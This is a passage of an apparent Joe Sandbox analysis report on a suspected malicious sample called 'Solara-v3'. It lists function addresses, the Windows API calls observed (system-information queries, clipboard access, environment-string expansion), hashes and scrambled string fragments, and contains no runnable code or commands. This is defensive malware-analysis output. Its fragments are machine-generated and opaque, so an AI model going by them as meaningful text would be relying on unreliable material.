                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C98B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                                              • Opcode ID: 138642e3b029cd67481014b7a1c73e129986cda9bd7b72bccbddae5cfeb5dc20
                                                                                                                                                                                                                                              • Instruction ID: 277084f53d57a87b5b2b20f77d7380db257985fd3cb1fd9ab0cb610f189f46a1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 138642e3b029cd67481014b7a1c73e129986cda9bd7b72bccbddae5cfeb5dc20
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE21D0752193918AD3358F25C8593EBB7E1EFD6300F68486EC4C9CB291DB7480498B55
                                                                                                                                                                                                                                              Function 00436B2D Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00436B5E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 95929093-0
                                                                                                                                                                                                                                              • Opcode ID: 31306f98e230910a5fd7d7977191c2fec37472a6c1007d9d0bebbc925698677f
                                                                                                                                                                                                                                              • Instruction ID: cdf554ddc886994256fa701720874313e26cc57f0015e9f664b6f87ea11e118c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31306f98e230910a5fd7d7977191c2fec37472a6c1007d9d0bebbc925698677f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11E472B112158BD718CB68CD526EEA7F3AFDD300F2AD07EC449D7298DA3C4A458A15
                                                                                                                                                                                                                                              Function 0043CCC0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B4B0,00000000,00000001), ref: 0043CCF2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: f74496de956946dffa7b91c889c0a81754d677ad04bfa79f72b50fce16be8890
                                                                                                                                                                                                                                              • Instruction ID: 3e35ca9de78357d80fd4bacc6a075dc7f03e91ea1ec4ff9afb29cf567c24048d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f74496de956946dffa7b91c889c0a81754d677ad04bfa79f72b50fce16be8890
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EE02B72404211EBC6512F267C06B5F3B68EF8B764F06183AF800A2162DB39F811C2DE
                                                                                                                                                                                                                                              Function 0040CC13 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC25
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                              • Opcode ID: 285b51be9f12c006e86ee7f8c2a2ec48db26b0aafef5a544261be67158f7b437
                                                                                                                                                                                                                                              • Instruction ID: c1ba3966c5ebc0bb1aa72e15ac49d3ddb4e269f0deaef98e892af36381d0cc8b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 285b51be9f12c006e86ee7f8c2a2ec48db26b0aafef5a544261be67158f7b437
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE0D87A7E0A043AF25C4629DD37F545153A7C1B12F38C36CB3122D2DCC5B4A4028108
                                                                                                                                                                                                                                              Function 0042EBD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: 9296605408a4aa8f42ffeadd4301eca10fa856db4b8f8b03f33fe2ee125ce19c
                                                                                                                                                                                                                                              • Instruction ID: dd30eb0f9bedd3f719cd28822517c03636a8239ffc1cd416ab20bf3b2583c864
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9296605408a4aa8f42ffeadd4301eca10fa856db4b8f8b03f33fe2ee125ce19c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F06D745097029FD314DF64D5A871ABBF1FB85304F50881DE4958B7A0C7B6A549CF82
                                                                                                                                                                                                                                              Function 00431563 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: a1bf64a6e68641f34fd65572d82cba1ace6207dc8bbbf3c2df9395e530bc443d
                                                                                                                                                                                                                                              • Instruction ID: 4c45bf1f3b2393cf066d11d4a873c6d75db077c42eb8bc10690dc6e6087ea188
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1bf64a6e68641f34fd65572d82cba1ace6207dc8bbbf3c2df9395e530bc443d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF0B2B46083029FE314EF29C5A871BBBE4AFC5304F11891CE4958B290CBB99949CF82
                                                                                                                                                                                                                                              Function 0043CE81 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043CE9A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                              • Opcode ID: 50d67614470f5ac9744d5140c2bd38d875ead9fb31099f94075d403dcd0e0617
                                                                                                                                                                                                                                              • Instruction ID: ac7b53e1434bc05ab928a2aff0f00397df47a67b60f94d82b014c2efecf6ae2b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50d67614470f5ac9744d5140c2bd38d875ead9fb31099f94075d403dcd0e0617
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE086BD9042429FC700DF14EC458653364EB1A315704443EE142C3372DA36D903DE08
                                                                                                                                                                                                                                              Function 0040CBE0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CBF3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                              • Opcode ID: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
                                                                                                                                                                                                                                              • Instruction ID: 276ef5dfe185dc0c3bd898d983644633ece5b914e2c36080a16977790bdaa27c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94D0A7345D01447BE344A75CEC07F22375C9793716F900235F662D65E1D9906910D6BD
                                                                                                                                                                                                                                              Function 0043B1A0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,004121FC), ref: 0043B1BE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                              • Opcode ID: 764c5e292d854dffb3dce8f316635c8f35a8183dcbb4b133c646b31cf2cd0cc2
                                                                                                                                                                                                                                              • Instruction ID: c647758476c43136972f23f3513579106d4cce35488911c36db9c9bf482454e3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 764c5e292d854dffb3dce8f316635c8f35a8183dcbb4b133c646b31cf2cd0cc2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37D01231405523EBC7101F19FC06B8A3A94DF0A321F430865B4046B0B1C664EC9086D8
                                                                                                                                                                                                                                              Function 0043B180 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,00408749,?,00408749), ref: 0043B190
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: f1ba20e54d5aeeddf63a642a1b492bef5fac5cb591cb86e8b73edcf7f871e8f5
                                                                                                                                                                                                                                              • Instruction ID: bd46a91a5c1b4e186f451d2a3caef90eea8ed5143fba280766b224e500ec41e2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1ba20e54d5aeeddf63a642a1b492bef5fac5cb591cb86e8b73edcf7f871e8f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31C09B31045121EBC6502F16FC05FC63F54EF55355F051455B404670F1C760EC41CADC

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00423C40 Relevance: 39.2, APIs: 2, Strings: 20, Instructions: 663COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D59
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00423D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                              • API String ID: 237503144-3538275056
                                                                                                                                                                                                                                              • Opcode ID: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
                                                                                                                                                                                                                                              • Instruction ID: 1666b33dfea27814c8a335e8a4f19e8460577b272b6aed58dd039adecd7a2ec5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA7263B99053699BDB60DF19DC883CDBB71FB95304F108AE9C4592B390DB784A81CF86
                                                                                                                                                                                                                                              Function 00423EC0 Relevance: 39.2, APIs: 1, Strings: 21, Instructions: 651COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$0b$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                              • API String ID: 0-1097330926
                                                                                                                                                                                                                                              • Opcode ID: a1f94b11949275e8069bc20abe81d2010a5b2d7f4bf8cf5f9cf8c986fdad36b1
                                                                                                                                                                                                                                              • Instruction ID: b07e6adf7c7580e31f81f34cb8ad9f597e7046c3fe9383923d964ddd8e2be701
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1f94b11949275e8069bc20abe81d2010a5b2d7f4bf8cf5f9cf8c986fdad36b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E7262B8D0526A9BDB60DF59DC883CDBB71FF95304F108AE9C4596B250DB380A81CF86
                                                                                                                                                                                                                                              Function 00424060 Relevance: 37.3, APIs: 1, Strings: 20, Instructions: 581COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                              • API String ID: 0-3538275056
                                                                                                                                                                                                                                              • Opcode ID: ff1fe25e9e673a135530696f1c2e179ad14c71c8b1183f928a20b5e979637931
                                                                                                                                                                                                                                              • Instruction ID: c58b3c97d3732406a86a154fa40332ade82447cee3a4b8ffceeb85e0bc4811b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff1fe25e9e673a135530696f1c2e179ad14c71c8b1183f928a20b5e979637931
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C6243B99052699BDB60DF19DC883CDBB71FFA5304F108AE9C4593B250DB384A81CF86
                                                                                                                                                                                                                                              Function 004177AD Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 788COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "f&f$)fvf$,ZA$,f4f$21$=f!f$=f(f$Jc1t$Jc1t$Pf6f${fGf
                                                                                                                                                                                                                                              • API String ID: 0-710588756
                                                                                                                                                                                                                                              • Opcode ID: d5eefe01124a04aaecba9110486d758d660dffb09e16bdc73fa1e38b142bf8cb
                                                                                                                                                                                                                                              • Instruction ID: ab1276890b7e4d60ac31e8d7f5af75c5f57bb126c4e48dcd0f14b83392fd953b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5eefe01124a04aaecba9110486d758d660dffb09e16bdc73fa1e38b142bf8cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3742F3765083118BD724CF25C8907ABB7F1EFC9314F15892EE8C997361EB389991CB4A
                                                                                                                                                                                                                                              Function 00420A20 Relevance: 16.7, Strings: 13, Instructions: 419COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
                                                                                                                                                                                                                                              • API String ID: 0-1612148737
                                                                                                                                                                                                                                              • Opcode ID: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                                              • Instruction ID: d8fb8020a3cc6f2a77e7ef34e68e444773c6829ddc0a3ffcdc26604336b8212f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89B126B16183208BC724DF18C85266BB7F1FFD1354F588A1DE4828F3A1E7789844CB96
                                                                                                                                                                                                                                              Function 004285E1 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 300COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042860A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                              • API String ID: 237503144-492521606
                                                                                                                                                                                                                                              • Opcode ID: 973a2b58bd6d7435bac51cb8ee912dccf8309705b16b7e8cff55539545f2cee1
                                                                                                                                                                                                                                              • Instruction ID: dfef59bcc1acdaadf563c9da893a7df5761e8c79a35e082c28548025607413e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 973a2b58bd6d7435bac51cb8ee912dccf8309705b16b7e8cff55539545f2cee1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54A1E2729083128BD714CF54D4506AFB3F1FFC1344F45892DE999AB350EB789945CB8A
                                                                                                                                                                                                                                              Function 00428A4D Relevance: 11.6, Strings: 9, Instructions: 394COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: J$,J^J$Uqmq$bJSJ$cJwJ$oq|q$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                              • API String ID: 0-594100160
                                                                                                                                                                                                                                              • Opcode ID: 99ed429220cc6030d532777ece67301cdc2336b41890651687883faee18324cc
                                                                                                                                                                                                                                              • Instruction ID: ace79c1ac5836ebcc237f59b1b0d0662a53369457569fb5ab3995258eec696b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ed429220cc6030d532777ece67301cdc2336b41890651687883faee18324cc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFC10EB1A083118BC714DF55D86166BB3F2FFC2354F04892DE8858B3A4FB78A954CB5A
                                                                                                                                                                                                                                              Function 004322E0 Relevance: 9.1, APIs: 6, Instructions: 104clipboardCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1494355150-0
                                                                                                                                                                                                                                              • Opcode ID: 11cf1c11e8cbcabd11fca72055923e1be0a33eac30008c65e1172c4418063db5
                                                                                                                                                                                                                                              • Instruction ID: 7b7471ec2985e3dad10513ed9157fb99150564327386af1641d632e56db34497
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11cf1c11e8cbcabd11fca72055923e1be0a33eac30008c65e1172c4418063db5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 993159B150C3118FD300AF79968536FBBE0AF99314F51283EE8C686211D6BD898A975B
                                                                                                                                                                                                                                              Function 0040DA8B Relevance: 7.8, Strings: 6, Instructions: 257COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 6""$D$d"P"$p"F"$""$""
                                                                                                                                                                                                                                              • API String ID: 0-1382292853
                                                                                                                                                                                                                                              • Opcode ID: abc874c9909978c4c67d63b3286c9fd06b2b4f2b84e92e02f925d395bc13f45d
